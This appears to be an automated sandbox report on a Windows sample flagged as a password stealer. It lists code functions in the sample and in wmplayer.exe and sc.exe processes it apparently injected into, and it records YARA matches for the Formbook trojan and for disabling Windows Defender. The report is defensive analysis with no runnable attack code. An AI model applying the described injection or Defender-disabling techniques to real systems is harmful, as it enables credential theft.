Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Code function: 0_2_00007FFD346947F9	0_2_00007FFD346947F9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Code function: 0_2_00007FFD34760003	0_2_00007FFD34760003
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_004030A0	6_2_004030A0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_00402AC0	6_2_00402AC0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_00402AB8	6_2_00402AB8
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_00402370	6_2_00402370
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0040FC8A	6_2_0040FC8A
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0040FC93	6_2_0040FC93
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_004165EE	6_2_004165EE
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_004165F3	6_2_004165F3
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0042D603	6_2_0042D603
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0040FEB3	6_2_0040FEB3
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0040DF2B	6_2_0040DF2B
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0040DF33	6_2_0040DF33
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0339132D	6_2_0339132D
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032CD34C	6_2_032CD34C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0339A352	6_2_0339A352
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0332739A	6_2_0332739A
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_033A03E6	6_2_033A03E6
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032EE3F0	6_2_032EE3F0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03380274	6_2_03380274
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032E52A0	6_2_032E52A0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_033812ED	6_2_033812ED
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032FB2C0	6_2_032FB2C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032D0100	6_2_032D0100
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0337A118	6_2_0337A118
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_033AB16B	6_2_033AB16B
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0331516C	6_2_0331516C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032CF172	6_2_032CF172
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_033A01AA	6_2_033A01AA
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032EB1B0	6_2_032EB1B0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_033981CC	6_2_033981CC
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_033970E9	6_2_033970E9
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0339F0E0	6_2_0339F0E0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032E70C0	6_2_032E70C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0338F0CC	6_2_0338F0CC
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032E0770	6_2_032E0770
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03304750	6_2_03304750
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0339F7B0	6_2_0339F7B0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032DC7C0	6_2_032DC7C0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032FC6E0	6_2_032FC6E0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_033916CC	6_2_033916CC
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032E0535	6_2_032E0535
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03397571	6_2_03397571
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0337D5B0	6_2_0337D5B0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_033A0591	6_2_033A0591
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0339F43F	6_2_0339F43F
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032D1460	6_2_032D1460
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03392446	6_2_03392446
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0338E4F6	6_2_0338E4F6
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0339FB76	6_2_0339FB76
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0339AB40	6_2_0339AB40
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032FFB80	6_2_032FFB80
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0331DBF9	6_2_0331DBF9
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03396BD7	6_2_03396BD7
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03353A6C	6_2_03353A6C
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0339FA49	6_2_0339FA49
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03397A46	6_2_03397A46
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03325AA0	6_2_03325AA0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0337DAAC	6_2_0337DAAC
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032DEA80	6_2_032DEA80
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0338DAC6	6_2_0338DAC6
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032F6962	6_2_032F6962
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032E9950	6_2_032E9950
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032FB950	6_2_032FB950
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032E29A0	6_2_032E29A0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_033AA9A6	6_2_033AA9A6
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0334D800	6_2_0334D800
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032E2840	6_2_032E2840
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032EA840	6_2_032EA840
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032C68B8	6_2_032C68B8
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0330E8F0	6_2_0330E8F0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032E38E0	6_2_032E38E0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03300F30	6_2_03300F30
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03322F28	6_2_03322F28
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0339FF09	6_2_0339FF09
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03354F40	6_2_03354F40
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0339FFB1	6_2_0339FFB1
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032E1F92	6_2_032E1F92
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032ECFE0	6_2_032ECFE0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032D2FC8	6_2_032D2FC8
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0339EE26	6_2_0339EE26
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032E0E59	6_2_032E0E59
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032E9EB0	6_2_032E9EB0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0339CE93	6_2_0339CE93
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032F2E90	6_2_032F2E90
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0339EEDB	6_2_0339EEDB
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032EAD00	6_2_032EAD00
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03397D73	6_2_03397D73
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03391D5A	6_2_03391D5A
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032E3D40	6_2_032E3D40
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032F8DBF	6_2_032F8DBF
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032DADE0	6_2_032DADE0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032FFDC0	6_2_032FFDC0
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03359C32	6_2_03359C32
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032E0C00	6_2_032E0C00
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_03380CB5	6_2_03380CB5
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_0339FCF2	6_2_0339FCF2
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: 6_2_032D0CF2	6_2_032D0CF2
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0356D34C	13_2_0356D34C
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0363A352	13_2_0363A352
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0363132D	13_2_0363132D
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_036403E6	13_2_036403E6
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0358E3F0	13_2_0358E3F0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035C739A	13_2_035C739A
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_03620274	13_2_03620274
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_036212ED	13_2_036212ED
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0359B2C0	13_2_0359B2C0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035852A0	13_2_035852A0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0364B16B	13_2_0364B16B
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0356F172	13_2_0356F172
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035B516C	13_2_035B516C
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_03608158	13_2_03608158
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_03570100	13_2_03570100
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0361A118	13_2_0361A118
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_036381CC	13_2_036381CC
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_036401AA	13_2_036401AA
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0358B1B0	13_2_0358B1B0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0363F0E0	13_2_0363F0E0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_036370E9	13_2_036370E9
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035870C0	13_2_035870C0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0362F0CC	13_2_0362F0CC
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035A4750	13_2_035A4750
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_03580770	13_2_03580770
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0357C7C0	13_2_0357C7C0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0363F7B0	13_2_0363F7B0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_036316CC	13_2_036316CC
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0359C6E0	13_2_0359C6E0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_03637571	13_2_03637571
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_03580535	13_2_03580535
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0361D5B0	13_2_0361D5B0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_03640591	13_2_03640591
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_03632446	13_2_03632446
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_03571460	13_2_03571460
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0363F43F	13_2_0363F43F
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0362E4F6	13_2_0362E4F6
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0363FB76	13_2_0363FB76
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0363AB40	13_2_0363AB40
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035BDBF9	13_2_035BDBF9
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035F5BF0	13_2_035F5BF0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_03636BD7	13_2_03636BD7
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0359FB80	13_2_0359FB80
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_03637A46	13_2_03637A46
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0363FA49	13_2_0363FA49
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035F3A6C	13_2_035F3A6C
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0362DAC6	13_2_0362DAC6
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0361DAAC	13_2_0361DAAC
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0357EA80	13_2_0357EA80
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035C5AA0	13_2_035C5AA0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_03589950	13_2_03589950
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0359B950	13_2_0359B950
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_03596962	13_2_03596962
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0364A9A6	13_2_0364A9A6
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035829A0	13_2_035829A0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_03582840	13_2_03582840
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0358A840	13_2_0358A840
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035ED800	13_2_035ED800
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035AE8F0	13_2_035AE8F0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035838E0	13_2_035838E0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035668B8	13_2_035668B8
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035F4F40	13_2_035F4F40
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0363FF09	13_2_0363FF09
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035A0F30	13_2_035A0F30
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035C2F28	13_2_035C2F28
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_03572FC8	13_2_03572FC8
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0358CFE0	13_2_0358CFE0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_03581F92	13_2_03581F92
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0363FFB1	13_2_0363FFB1
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_03580E59	13_2_03580E59
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0363EE26	13_2_0363EE26
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0363EEDB	13_2_0363EEDB
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_03592E90	13_2_03592E90
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_03589EB0	13_2_03589EB0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0363CE93	13_2_0363CE93
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_03637D73	13_2_03637D73
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_03583D40	13_2_03583D40
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_03631D5A	13_2_03631D5A
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0358AD00	13_2_0358AD00
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0359FDC0	13_2_0359FDC0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0357ADE0	13_2_0357ADE0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_03598DBF	13_2_03598DBF
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_03580C00	13_2_03580C00
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_035F9C32	13_2_035F9C32
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_0363FCF2	13_2_0363FCF2
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_03570CF2	13_2_03570CF2
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_03620CB5	13_2_03620CB5
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_02E11780	13_2_02E11780
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_02E2A2E0	13_2_02E2A2E0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_02E132CB	13_2_02E132CB
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_02E132D0	13_2_02E132D0
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_02E0CB90	13_2_02E0CB90
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_02E0C967	13_2_02E0C967
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_02E0C970	13_2_02E0C970
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_02E0AC08	13_2_02E0AC08
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_02E0AC10	13_2_02E0AC10
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_033BBB63	13_2_033BBB63
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_033BBA48	13_2_033BBA48
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_033BAF68	13_2_033BAF68
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_033BBEFD	13_2_033BBEFD
Source: C:\Windows\SysWOW64\sc.exe	Code function: 13_2_033BBCCB	13_2_033BBCCB

Found potential string decryption / allocating functions

Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: String function: 0335F290 appears 105 times
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: String function: 032CB970 appears 268 times
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: String function: 03327E54 appears 89 times
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: String function: 03315130 appears 36 times
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Code function: String function: 0334EA12 appears 86 times
Source: C:\Windows\SysWOW64\sc.exe	Code function: String function: 035C7E54 appears 96 times
Source: C:\Windows\SysWOW64\sc.exe	Code function: String function: 035FF290 appears 105 times
Source: C:\Windows\SysWOW64\sc.exe	Code function: String function: 035EEA12 appears 86 times
Source: C:\Windows\SysWOW64\sc.exe	Code function: String function: 035B5130 appears 36 times
Source: C:\Windows\SysWOW64\sc.exe	Code function: String function: 0356B970 appears 268 times

One or more processes crash

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1512 -s 1456

PE file does not import any functions

Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe

Static PE information: No import functions for PE file found

Sample file is different than original file name gathered from version info

Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000000.2091070027.000001DF09F0D000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameEtafudeqosubujasugaz6 vs SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe
Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2455500615.000001DF0BBB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameEzemesefejoF vs SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe
Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe	Binary or memory string: OriginalFilenameEtafudeqosubujasugaz6 vs SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe

Yara signature match

Source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe.1df0bbf5348.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0.2.SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe.1df0bbf5348.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 0000000D.00000002.3944875828.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.2322232096.00000000035F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.3948817261.00000000057D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.2321692626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.3945190684.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.3945837611.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.2322275427.00000000040C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2454248653.000001DF0A114000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbPROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocaQ,
Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2454248653.000001DF0A0A3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb

